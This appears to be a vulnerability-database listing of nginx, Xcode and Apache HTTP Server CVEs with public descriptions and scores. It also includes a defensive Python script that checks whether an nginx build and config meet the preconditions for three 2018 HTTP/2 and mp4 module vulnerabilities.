CVE-2018-4357
7.8 - High
- April 03, 2019
A memory corruption issue was addressed with improved input validation. This issue affected versions prior to Xcode 10.
Buffer Overflow
nginx before versions 1.15.6, 1.14.1 has a vulnerability in the ngx_http_mp4_module, which might
CVE-2018-16845
6.1 - Medium
- November 07, 2018
nginx before versions 1.15.6, 1.14.1 has a vulnerability in the ngx_http_mp4_module, which might allow an attacker to cause infinite loop in a worker process, cause a worker process crash, or might result in worker process memory disclosure by using a specially crafted mp4 file. The issue only affects nginx if it is built with the ngx_http_mp4_module (the module is not built by default) and the `mp4` directive is used in the configuration file. Further, the attack is only possible if an attacker is able to trigger processing of a specially crafted mp4 file with the ngx_http_mp4_module.
Resource Exhaustion
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive CPU usage
CVE-2018-16844
7.5 - High
- November 07, 2018
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive CPU usage. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file.
Resource Exhaustion
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption
CVE-2018-16843
7.5 - High
- November 07, 2018
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file.
Resource Exhaustion
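The three nginx advisories above each name a build-time and a configuration precondition: the `mp4` directive together with `ngx_http_mp4_module`, or `http2` on a `listen` directive together with `ngx_http_v2_module`, neither module being built by default. The Python below is an added exposure check, not part of nginx or of this listing: it reads the `configure arguments:` line that `nginx -V` prints on stderr, compares the version against 1.14.1/1.15.6, and scans a config for the two directives with a deliberately small tokenizer that drops comments and braces but does not follow `include` or parse quoted strings. The `nginx -V` report and both configs are constructed samples.

```python
import re

_VERSION_RE = re.compile(r"nginx/(\d+)\.(\d+)\.(\d+)")


def nginx_version(nginx_v_output):
    m = _VERSION_RE.search(nginx_v_output)
    if m is None:
        raise ValueError("no 'nginx version: nginx/x.y.z' line found")
    return tuple(int(x) for x in m.groups())


def version_affected(nginx_v_output):
    """Before 1.14.1 on the stable line, or 1.15.0 up to 1.15.5 on the mainline."""
    v = nginx_version(nginx_v_output)
    return v < (1, 14, 1) or (1, 15, 0) <= v < (1, 15, 6)


def configure_args(nginx_v_output):
    """The build's configure flags, e.g. {'--with-http_v2_module', ...}."""
    m = re.search(r"^configure arguments:(.*)$", nginx_v_output, re.M)
    return set(m.group(1).split()) if m else set()


def directives(conf_text):
    """Yield (name, args) for every directive. Comments are dropped; braces and
    semicolons end a statement. Does not follow `include` or honour quoting."""
    text = re.sub(r"#.*", "", conf_text)
    for stmt in re.split(r"[;{}]", text):
        parts = stmt.split()
        if parts:
            yield parts[0], parts[1:]


def exposure(nginx_v_output, conf_text):
    """Per-CVE verdict: affected version AND module built AND directive in use."""
    args = configure_args(nginx_v_output)
    ds = list(directives(conf_text))
    old = version_affected(nginx_v_output)
    mp4 = "--with-http_mp4_module" in args and any(n == "mp4" for n, _ in ds)
    # In these versions HTTP/2 is enabled per listener: `listen ... http2;`
    http2 = "--with-http_v2_module" in args and any(n == "listen" and "http2" in a for n, a in ds)
    return {
        "CVE-2018-16845": old and mp4,
        "CVE-2018-16844": old and http2,
        "CVE-2018-16843": old and http2,
    }


# Constructed `nginx -V` report (stderr) for a build that has both optional modules.
SAMPLE_NGINX_V = """nginx version: nginx/1.14.0
built by gcc 7.3.0 (Ubuntu 7.3.0-16ubuntu3)
built with OpenSSL 1.1.0g  2 Nov 2017
TLS SNI support enabled
configure arguments: --prefix=/etc/nginx --with-http_ssl_module --with-http_v2_module --with-http_mp4_module
"""

# Constructed config exercising both preconditions; hostname is an example domain.
SAMPLE_CONF = """
http {
    server {
        listen 443 ssl http2;   # HTTP/2 enabled on this listener
        server_name media.example.com;
        location /video/ {
            mp4;                # pseudo-streaming via ngx_http_mp4_module
        }
    }
}
"""

# The same server with neither feature in use: module presence alone is not exposure.
SAMPLE_CONF_SAFE = """
http {
    server {
        listen 443 ssl;
        server_name media.example.com;
        location /video/ { root /srv/media; }
    }
}
"""
```

On a live host, pass `subprocess.run(["nginx", "-V"], capture_output=True, text=True).stderr` and the text of the main config plus anything it includes; a `False` that rests only on the config should still be re-checked after the next config change.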
An issue was discovered in certain Apple products
CVE-2018-4164
9.8 - Critical
- April 03, 2018
An issue was discovered in certain Apple products. Xcode before 9.3 is affected. The issue, which is unspecified, involves the "LLVM" component.
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
CVE-2017-7529
7.5 - High
- July 13, 2017
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
Integer Overflow or Wraparound
The resolver in nginx before 1.8.1 and 1.9.x before 1.9.10 does not properly limit CNAME resolution, which
CVE-2016-0747
5.3 - Medium
- February 15, 2016
The resolver in nginx before 1.8.1 and 1.9.x before 1.9.10 does not properly limit CNAME resolution, which allows remote attackers to cause a denial of service (worker process resource consumption) via vectors related to arbitrary name resolution.
Resource Exhaustion
Use-after-free vulnerability in the resolver in nginx 0.6.18 through 1.8.0 and 1.9.x before 1.9.10
CVE-2016-0746
9.8 - Critical
- February 15, 2016
Use-after-free vulnerability in the resolver in nginx 0.6.18 through 1.8.0 and 1.9.x before 1.9.10 allows remote attackers to cause a denial of service (worker process crash) or possibly have unspecified other impact via a crafted DNS response related to CNAME response processing.
Dangling pointer
The resolver in nginx before 1.8.1 and 1.9.x before 1.9.10
CVE-2016-0742
7.5 - High
- February 15, 2016
The resolver in nginx before 1.8.1 and 1.9.x before 1.9.10 allows remote attackers to cause a denial of service (invalid pointer dereference and worker process crash) via a crafted UDP DNS response.
NULL Pointer Dereference
The ap_some_auth_required function in server/request.c in the Apache HTTP Server 2.4.x before 2.4.14 does not consider
CVE-2015-3185
- July 20, 2015
The ap_some_auth_required function in server/request.c in the Apache HTTP Server 2.4.x before 2.4.14 does not consider that a Require directive may be associated with an authorization setting rather than an authentication setting, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging the presence of a module that relies on the 2.2 API behavior.
Permissions, Privileges, and Access Controls